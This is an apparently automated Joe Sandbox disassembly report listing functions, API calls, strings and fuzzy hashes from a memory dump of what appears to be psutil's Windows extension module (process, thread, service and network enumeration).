                                                                                                                                                                                                                • API String ID: 1058843278-3097090287
                                                                                                                                                                                                                • Opcode ID: a320372d8f5e0e84fe72d2109c7aa1b9063dbd94d06811a1af5d855d0ca0114b
                                                                                                                                                                                                                • Instruction ID: 28b8e499455cfb499646e761e0d32ef7941a4096d7d05986c7f3efd0043e920d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a320372d8f5e0e84fe72d2109c7aa1b9063dbd94d06811a1af5d855d0ca0114b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13B1D5B1B18A4286EB21DF36D4545B96760FF9DB88B806232DA8E52760FF3DF509C340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 681 7ffb9dd66ae0-7ffb9dd66b27 682 7ffb9dd66b37-7ffb9dd66b4d OpenProcess 681->682 683 7ffb9dd66b29-7ffb9dd66b35 call 7ffb9dd61180 681->683 685 7ffb9dd66b6f-7ffb9dd66b74 call 7ffb9dd67a40 682->685 686 7ffb9dd66b4f-7ffb9dd66b58 GetLastError 682->686 690 7ffb9dd66b79-7ffb9dd66b7f 683->690 685->690 686->685 688 7ffb9dd66b5a-7ffb9dd66b6a call 7ffb9dd61070 686->688 695 7ffb9dd66e47-7ffb9dd66e70 call 7ffb9dd6a0a0 688->695 693 7ffb9dd66e2e-7ffb9dd66e33 690->693 694 7ffb9dd66b85-7ffb9dd66ba4 NtQueryInformationProcess 690->694 693->695 696 7ffb9dd66bfb-7ffb9dd66c0b 694->696 697 7ffb9dd66ba6-7ffb9dd66bb4 694->697 698 7ffb9dd66c11-7ffb9dd66c23 ReadProcessMemory 696->698 699 7ffb9dd66c98-7ffb9dd66cad NtQueryInformationProcess 696->699 701 7ffb9dd66bbb-7ffb9dd66bc3 RtlNtStatusToDosErrorNoTeb 697->701 702 7ffb9dd66bb6-7ffb9dd66bb9 697->702 706 7ffb9dd66c45-7ffb9dd66c62 ReadProcessMemory 698->706 707 7ffb9dd66c25-7ffb9dd66c40 GetLastError call 7ffb9dd66980 CloseHandle 698->707 703 7ffb9dd66cd0-7ffb9dd66cef ReadProcessMemory 699->703 704 7ffb9dd66caf-7ffb9dd66ccb call 7ffb9dd61350 CloseHandle 699->704 705 7ffb9dd66bc5-7ffb9dd66bf6 call 7ffb9dd61010 PyErr_SetFromWindowsErrWithFilename CloseHandle 701->705 702->705 703->707 711 7ffb9dd66cf5-7ffb9dd66d13 ReadProcessMemory 703->711 704->695 705->695 706->707 713 7ffb9dd66c64-7ffb9dd66c68 706->713 707->695 711->707 716 7ffb9dd66d19-7ffb9dd66d1d 711->716 718 7ffb9dd66c8c-7ffb9dd66c93 713->718 719 7ffb9dd66c6a-7ffb9dd66c6d 713->719 720 7ffb9dd66dba-7ffb9dd66dc1 716->720 721 7ffb9dd66d23-7ffb9dd66d26 716->721 724 7ffb9dd66dc8-7ffb9dd66ddd calloc 718->724 722 7ffb9dd66c80-7ffb9dd66c87 719->722 723 7ffb9dd66c6f-7ffb9dd66c72 719->723 720->724 727 7ffb9dd66db0-7ffb9dd66db8 721->727 728 7ffb9dd66d2c-7ffb9dd66d2f 721->728 722->724 729 7ffb9dd66d31-7ffb9dd66d39 723->729 730 7ffb9dd66c78-7ffb9dd66c7b 723->730 725 7ffb9dd66ddf-7ffb9dd66df2 PyErr_NoMemory CloseHandle 724->725 726 7ffb9dd66df4-7ffb9dd66e0d ReadProcessMemory 724->726 725->695 731 7ffb9dd66e0f-7ffb9dd66e28 GetLastError call 7ffb9dd66980 CloseHandle free 726->731 732 7ffb9dd66e35-7ffb9dd66e43 CloseHandle 726->732 727->724 728->729 733 7ffb9dd66d40 728->733 734 7ffb9dd66d3b 729->734 735 7ffb9dd66d47-7ffb9dd66d61 VirtualQueryEx 729->735 730->735 731->693 732->695 733->735 734->724 737 7ffb9dd66da1-7ffb9dd66dae 735->737 738 7ffb9dd66d63-7ffb9dd66d9c GetLastError call 7ffb9dd61010 PyErr_SetFromWindowsErrWithFilename CloseHandle 735->738 737->724 738->695
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$ErrorProcess$Err_LastMemory$Read$FilenameFromQueryWindowsWith$CallDeallocFunctionInformationObjectObject_OpenStatusVirtualcallocfree
                                                                                                                                                                                                                • String ID: (originated from %s)$NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessWow64Information)$OpenProcess$VirtualQueryEx$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 1900539510-2577306957
                                                                                                                                                                                                                • Opcode ID: c8295b2ffe7de3d488017858fedd4bab0bb80bf64b607186aeec1f4e7c62e53a
                                                                                                                                                                                                                • Instruction ID: 444704edb93639f26b9fc169db76a141446824ec6ba68d79161bdc7105ce7932
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8295b2ffe7de3d488017858fedd4bab0bb80bf64b607186aeec1f4e7c62e53a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA162A1B08A4282EB349B77E8506BD2761FF4D788F856135DE8E47694FF3CE5498380

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 742 7ffb9dd66640-7ffb9dd66671 PyList_New 743 7ffb9dd66968-7ffb9dd66976 742->743 744 7ffb9dd66677-7ffb9dd666b6 EnterCriticalSection GetProcessHeap HeapAlloc 742->744 745 7ffb9dd666b8 PyErr_NoMemory 744->745 746 7ffb9dd666d5-7ffb9dd666ed NtQuerySystemInformation 744->746 747 7ffb9dd666be-7ffb9dd666c2 745->747 748 7ffb9dd666ef 746->748 749 7ffb9dd66749-7ffb9dd6674b 746->749 750 7ffb9dd666cd-7ffb9dd666d0 747->750 751 7ffb9dd666c4-7ffb9dd666c7 _Py_Dealloc 747->751 752 7ffb9dd666f0-7ffb9dd6670e GetProcessHeap HeapFree 748->752 753 7ffb9dd66790-7ffb9dd66798 749->753 754 7ffb9dd6674d-7ffb9dd6676f call 7ffb9dd61350 GetProcessHeap HeapFree 749->754 756 7ffb9dd668c6-7ffb9dd668e3 750->756 751->750 757 7ffb9dd66710-7ffb9dd6672d GetProcessHeap HeapAlloc 752->757 758 7ffb9dd66774-7ffb9dd6678b PyErr_SetString 752->758 755 7ffb9dd6679e 753->755 753->756 754->747 760 7ffb9dd667a0-7ffb9dd667ad 755->760 761 7ffb9dd668eb-7ffb9dd668f3 756->761 762 7ffb9dd668e5 CloseHandle 756->762 757->745 763 7ffb9dd6672f-7ffb9dd66747 NtQuerySystemInformation 757->763 758->747 765 7ffb9dd668b7-7ffb9dd668be 760->765 766 7ffb9dd667b3-7ffb9dd667f0 GetCurrentProcess DuplicateHandle 760->766 767 7ffb9dd66918-7ffb9dd6691b 761->767 768 7ffb9dd668f5-7ffb9dd6690d GetProcessHeap HeapFree 761->768 762->761 763->749 763->752 765->760 769 7ffb9dd668c4 765->769 766->765 770 7ffb9dd667f6-7ffb9dd66807 call 7ffb9dd663f0 766->770 771 7ffb9dd6692c-7ffb9dd6692f 767->771 772 7ffb9dd6691d-7ffb9dd66921 767->772 768->767 769->756 770->747 779 7ffb9dd6680d-7ffb9dd66817 770->779 775 7ffb9dd66931-7ffb9dd6693f GetProcessHeap HeapFree 771->775 776 7ffb9dd66945-7ffb9dd66956 LeaveCriticalSection 771->776 772->771 774 7ffb9dd66923-7ffb9dd66926 _Py_Dealloc 772->774 774->771 775->776 776->743 778 7ffb9dd66958-7ffb9dd66967 776->778 780 7ffb9dd6689d-7ffb9dd668ab CloseHandle 779->780 781 7ffb9dd6681d-7ffb9dd66820 779->781 780->765 782 7ffb9dd66822-7ffb9dd6682d 781->782 783 7ffb9dd66875-7ffb9dd66878 781->783 785 7ffb9dd66830-7ffb9dd66837 782->785 783->780 784 7ffb9dd6687a-7ffb9dd66892 GetProcessHeap HeapFree 783->784 784->780 785->785 786 7ffb9dd66839-7ffb9dd66845 PyUnicode_FromWideChar 785->786 786->747 787 7ffb9dd6684b-7ffb9dd66859 PyList_Append 786->787 787->747 788 7ffb9dd6685f-7ffb9dd66863 787->788 789 7ffb9dd6686e 788->789 790 7ffb9dd66865-7ffb9dd66868 _Py_Dealloc 788->790 789->783 790->789
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$DeallocErr_Handle$AllocCloseCriticalFromInformationList_QuerySectionSystem$AppendCharCreateCurrentDuplicateEnterErrorFilenameLastLeaveMemoryStringThreadUnicode_WideWindowsWith
                                                                                                                                                                                                                • String ID: NtQuerySystemInformation$SystemExtendedHandleInformation buffer too big
                                                                                                                                                                                                                • API String ID: 3865821507-122811375
                                                                                                                                                                                                                • Opcode ID: c4a5de306b90e526424b4602c5ef27e05d2bd4df123f104502fd33fac498fd26
                                                                                                                                                                                                                • Instruction ID: b692363692a196194fe6ee5a1db410d48dbe3e979f6a9984f76b04bdb44c2f3f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4a5de306b90e526424b4602c5ef27e05d2bd4df123f104502fd33fac498fd26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D9138B1B08A4681EB749B73E90837927A1BF8DBD4F856075CE9D427A4FF3DA4448380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BuildFromList_StringUnicode_Valueinet_ntop$Appendfree$AdaptersAddressesCharConvertErr_Ipv4LengthMaskWideswprintf_s
                                                                                                                                                                                                                • String ID: %.2X$%.2X-$(OiOOOO)
                                                                                                                                                                                                                • API String ID: 2354107120-528653562
                                                                                                                                                                                                                • Opcode ID: 6cb7d9fc68a6995530d308a66b6087f0a2fcfd18f436fba966a9198ec38cb5c8
                                                                                                                                                                                                                • Instruction ID: dcbfc291daf80e74fafd5f05a2aa1e2e616b420a1bc5da8764c525897ae19caf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cb7d9fc68a6995530d308a66b6087f0a2fcfd18f436fba966a9198ec38cb5c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41C16FB1B09A4A85EA309F77E84427A63A0FF5DB94F896035CA8D06764FF3DE405C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$CloseErr_HandleMemory$AllocFreeQueryVirtual$Arg_CallDeallocErrorFunctionLastObjectObject_OpenParseStringTuple
                                                                                                                                                                                                                • String ID: NtQueryVirtualMemory -> STATUS_ACCESS_DENIED$NtQueryVirtualMemory bufsize is too large$NtQueryVirtualMemory(MemoryWorkingSetInformation)$OpenProcess$automatically set for PID 0$psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 757443668-943580704
                                                                                                                                                                                                                • Opcode ID: b71a64530069c677a809283d696a5f1953f166047fe1c145e414f98cddc3afaf
                                                                                                                                                                                                                • Instruction ID: 0b9c7e22cb1a08a6caf29668e324bbb279a5068c57c0751a98b31c6a1aade18b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b71a64530069c677a809283d696a5f1953f166047fe1c145e414f98cddc3afaf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A614EA1F0DA4696FB309B77E85427963A1BF8DB85F856035CD8E437A4FE3CE4448680
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$From$CharCloseEnumErrorHandleLastList_ServiceServicesStatusUnicode_Widefree$AppendBuildErr_FilenameManagerOpenValueWindowsWith__stdio_common_vsprintfmalloc
                                                                                                                                                                                                                • String ID: (OO)$(originated from %s)$OpenSCManager
                                                                                                                                                                                                                • API String ID: 1483861492-3715750162
                                                                                                                                                                                                                • Opcode ID: 0e5b709e1c71a3b6d376ad3df50edb984c2a26360f830a8c7b205a43c73c2716
                                                                                                                                                                                                                • Instruction ID: 198643e685ec577fab6fab1108a225a277dfa7cd46288eae34de2d26b64c9960
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e5b709e1c71a3b6d376ad3df50edb984c2a26360f830a8c7b205a43c73c2716
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5813DB1B09B4285EA308B32E444279B3A4FF8DBA4F856135DADE427A4FF3CE5458740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_CallDeallocErr_FunctionObjectObject_ParseTuple
                                                                                                                                                                                                                • String ID: NtQuerySystemInformation$automatically set for PID 0$psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 3936211163-1794217337
                                                                                                                                                                                                                • Opcode ID: e379bc5b234712f1f00d11cf854f2084873b799b4a562e34e8782a0d3422e626
                                                                                                                                                                                                                • Instruction ID: ab76b14194685123b88409a31c2e1eaf71cbd6fc9c30183ac5f972bd3fa2f5b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e379bc5b234712f1f00d11cf854f2084873b799b4a562e34e8782a0d3422e626
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 336142A2B0CB8682EB60DB67F44417A6761FF8DB84F856035DA8D43764FE3CE5458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$Err_Process$InformationMemoryQuerycallocfree$ErrorLastOpenStringwcscpy_s
                                                                                                                                                                                                                • String ID: NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessBasicInformation) -> STATUS_NOT_FOUND$NtQueryInformationProcess(ProcessCommandLineInformation)$OpenProcess$automatically set for PID 0$requires Windows 8.1+
                                                                                                                                                                                                                • API String ID: 3434980512-710783819
                                                                                                                                                                                                                • Opcode ID: 717a8c462aa9d2c41fc620fc9e45f7d6932c80ffe9cc37193ea9dca8e841e3a0
                                                                                                                                                                                                                • Instruction ID: 7a62d8496af558075f82bd90ba48dfd4c81f31e6e5817e6aec71dc44aa18d39e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 717a8c462aa9d2c41fc620fc9e45f7d6932c80ffe9cc37193ea9dca8e841e3a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21518CA1B0CA0282EB309B73E9542792760AF4DBD0FD46131D9DE42BA4FF3CE4498380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseDeallocHandle$List_ThreadThread32$AppendArg_BuildCallErr_FirstFunctionNextObjectObject_OpenParseTimesTupleValue
                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$GetThreadTimes$Thread32First$forced for PID 0$kdd$psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 3176497124-1899450870
                                                                                                                                                                                                                • Opcode ID: 5218f5395032ed042fb60b889ae864f910d6761222d0dd7d4f2e525bf3afcb04
                                                                                                                                                                                                                • Instruction ID: 7d3fc9c341796dc0758977b4c995e3d38032e94b7ad0f7e301342f1e44552bf1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5218f5395032ed042fb60b889ae864f910d6761222d0dd7d4f2e525bf3afcb04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 947175B1B0CA4286EB61DB36E450279A3A1FF9D790F846231E99E43654FF3CE445C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BuildCharErrorFromLastList_Unicode_ValueWideswprintf_s
                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$OOd$WTSEnumerateSessionsW$WTSQuerySessionInformationW
                                                                                                                                                                                                                • API String ID: 35727893-281470548
                                                                                                                                                                                                                • Opcode ID: 05cac43af260b9a95e10f10a97548b1f1d4c4ccc0ce7d84133d1006f8f088dc4
                                                                                                                                                                                                                • Instruction ID: e1cfed305487146d12b7e118fd4d255079a75a1a2424a419f0e2e5c1a8104346
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05cac43af260b9a95e10f10a97548b1f1d4c4ccc0ce7d84133d1006f8f088dc4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8C14CB1B09A4285EB74CF72E9502BD73B0AF49B94F841136CD9E52A94FF3CA509C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$From$CloseDict_HandleLongLong_Process32$CreateErr_FirstItemNextSnapshotToolhelp32Windowsmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1629090121-0
                                                                                                                                                                                                                • Opcode ID: 078a453b94b3af55ca3becf16c7fa20fc013800b24ea59984ca65c7d3f2a397a
                                                                                                                                                                                                                • Instruction ID: 96a09a6fa24b032ca1fb3e9db52517f91a20b76781312c2af55de74210143ad7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 078a453b94b3af55ca3becf16c7fa20fc013800b24ea59984ca65c7d3f2a397a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7519572B0DA8286E7369F36E81427D3BA0AF8EBA0F895071CACD46655FE2CD445C741
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree$Err_ErrorFileLastMemoryObjectQueryType
                                                                                                                                                                                                                • String ID: NtQuerySystemInformation
                                                                                                                                                                                                                • API String ID: 448133315-2549949336
                                                                                                                                                                                                                • Opcode ID: 173ed2a84f7f2092116857aa56532c888c5385018bd866124a014456846aa5aa
                                                                                                                                                                                                                • Instruction ID: 58891cc20aa93791fd9ae4a6bda6806bce98b99173cca267fe53eb7770f16fd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 173ed2a84f7f2092116857aa56532c888c5385018bd866124a014456846aa5aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04311DA1B08F0686EB249B77E44823967A1BF4DB80F952475D99E837A1FF7DE4048780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$Object_$Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectOpenParseResumeSuspendTrueTuple
                                                                                                                                                                                                                • String ID: NtSuspend|ResumeProcess$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 3554915889-3759402225
                                                                                                                                                                                                                • Opcode ID: 7fe35ee0cee9196c9350aa1929796caaec3d297f6f1b8f1f090c40a2d7c9568f
